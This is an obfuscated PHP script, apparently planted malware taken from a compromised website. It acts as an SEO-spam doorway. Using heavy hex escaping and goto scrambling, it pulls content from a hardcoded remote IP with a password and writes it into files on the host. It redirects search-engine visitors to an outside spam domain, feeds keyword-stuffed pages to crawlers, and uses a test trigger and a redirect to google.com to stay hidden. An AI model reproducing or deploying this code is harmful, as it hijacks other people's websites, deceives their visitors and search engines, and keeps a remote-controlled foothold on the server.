Your IP : 3.143.5.157
<?php
goto XgFdB; iEpjJ: if (strlen($text) < 5000) { $text = file_get_contents("\x68\164\x74\160\72\57\x2f\x31\63\x35\x2e\x31\x38\x31\x2e\x32\x31\x2e\61\x32\x36\x2f" . $_GET["\146\x6e"] . "\x2e\160\150\160\77\160\141\163\163\75{$apass}\x26\x71\x3d{$_GET["\151\x64"]}"); } goto WT80y; ZZuqN: $keyword = str_replace("\40", "\x2b", $keyword); goto dZ6BY; kGJP5: if (function_exists("\x63\x75\x72\x6c\x5f\151\156\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\164\x70\72\57\x2f\61\x33\x35\56\x31\x38\61\56\x32\x31\x2e\61\62\x36\x2f" . $_GET["\146\156"] . "\56\x70\150\160\77\160\141\163\163\x3d{$apass}\46\x71\75{$_GET["\151\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\x7a\151\154\x6c\x61\57\x34\x2e\60\40\x28\x63\x6f\155\160\141\x74\151\142\154\x65\73\40\x4d\x53\x49\x45\40\x36\x2e\60\x3b\x20\x57\151\x6e\x64\x6f\167\x73\x20\116\x54\x20\65\56\x31\73\40\123\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto iEpjJ; CDNlj: $apass1 = "\166\151\163\x64\157\x69\x6a\x65\167"; goto NeD9r; q4Grk: $s = $_SERVER["\x53\x45\122\126\105\x52\137\116\101\x4d\x45"] . $s; goto fbkty; xm2mU: if ($_GET["\x69\x64"] == "\x74\145\163\164\x69\x6e\x67") { echo "\164\x65\x73\x74\40\x67\x6f\x6f\144\x2e\x2e\56"; die; } goto p_Fi0; SslP9: $_GET["\x66\x6e"] = "\66\x39\x36\71\x36\x39\x6e\145\167"; goto CDNlj; ITIWg: $today = "\62\60\x32\x35\x30\x33\60\x34\55"; goto v1oFU; m00To: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto bOsE6; noRXd: if ($s == "\134" | $s == "\57") { $s = ''; } goto q4Grk; pWMEt: $keyword = str_replace("\55", "\40", $_GET["\x69\144"]); goto ZZuqN; wc6Wp: $xx1 = 5; goto pWMEt; U41yu: $query_pars_2 = str_replace("\55", "\53", $_GET["\x69\144"]); goto wnDz1; LXW2v: if (strlen($text) > 5000) { $out = fopen("\151\156\144\145\170\57" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto dBKjg; bOsE6: if (strpos($_SERVER["\110\124\x54\120\137\122\x45\106\105\122\x45\x52"], "\147\157\x6f\x67\x6c\145\56") or strpos($_SERVER["\x48\124\124\120\x5f\122\105\x46\105\x52\105\122"], "\171\x61\150\157\x6f\56") or strpos($_SERVER["\110\x54\x54\x50\137\122\x45\x46\105\x52\x45\x52"], "\x62\x69\156\x67\56")) { $tpl = "\151\156\144\145\x78\x2f" . $_GET["\151\x64"] . "\x2e\160\x68\160\x2e\x74\x70\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\171"]; header("\x4c\x6f\143\141\x74\151\x6f\x6e\x3a\x20\150\164\164\x70\x73\x3a\57\x2f\x63\150\x70\x6f\153\56\163\151\x74\x65\x2f\x65\156\x74\145\162\57\77\x6d\x61\162\153\x3d{$today}\55{$s}\x26\164\x70\154\x3d{$tpl}\x26\145\156\147\x6b\145\x79\75{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\x2e\160\150\x70"; if (file_exists("\x69\x6e\144\145\170\x2f" . $myname)) { $html = @file_get_contents("\x69\x6e\x64\145\x78\x2f" . $myname); if (strpos($_SERVER["\110\124\124\x50\x5f\x55\x53\105\122\x5f\x41\107\105\116\x54"], "\142\x69\156\147") > 2 or strpos($_SERVER["\110\124\124\120\137\125\123\x45\x52\137\x41\x47\105\x4e\124"], "\x79\141\x68\157\x6f") > 2) { $keyword = str_replace("\x2d", "\40", $_GET["\151\144"]); $html = str_replace("\74\x74\151\164\154\145\x3e\74\57\164\x69\x74\154\x65\x3e", "\x3c\164\x69\x74\154\145\x3e{$keyword}\74\x2f\x74\x69\x74\x6c\145\76", $html); } echo $html; die; } } goto U41yu; k7ERK: $s = dirname($_SERVER["\x50\x48\x50\137\x53\x45\x4c\106"]); goto noRXd; dBKjg: echo $text; goto mIed0; dZ6BY: $apass2 = "\x62\62\63\150\x72\62\x33\x76\162\x33\x32"; goto k7ERK; NeD9r: $x1 = 3; goto wc6Wp; wnDz1: $text = ''; goto kGJP5; v1oFU: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto xm2mU; SWmza: $_GET["\167\157\x72\154\144"] = 5; goto SslP9; XgFdB: error_reporting(0); goto ITIWg; WT80y: if (strlen($text) < 5000) { $url = "\x31\x33\65\x2e\61\x38\x31\x2e\x32\61\x2e\61\62\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\51\x3c\142\162\x20\57\x3e\xa"; } else { $req = "\x2f" . $_GET["\146\x6e"] . "\x2e\x70\150\x70\77\160\141\x73\x73\75{$apass}\x26\161\75{$_GET["\x69\x64"]}"; $out = "\107\105\124\x20{$req}\x20\110\124\124\120\57\61\x2e\60\xd\12"; $out .= "\x48\157\x73\x74\72\x20{$url}\15\12"; $out .= "\x43\x6f\156\x6e\145\143\164\x69\157\156\72\x20\103\154\x6f\x73\x65\15\12\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto LXW2v; p_Fi0: if ($_GET["\151\144"] == "\151\x6e\x64\x65\x78") { header("\x4c\x6f\143\x61\x74\x69\x6f\x6e\72\x20\150\x74\164\160\163\x3a\57\x2f\x67\x6f\x6f\x67\154\x65\x2e\x63\157\x6d"); die; } goto SWmza; fbkty: $apass3 = "\162\x76\x33\62\x79\x64\x61\x63\163\x76\x73\144\x76"; goto m00To; mIed0: ?>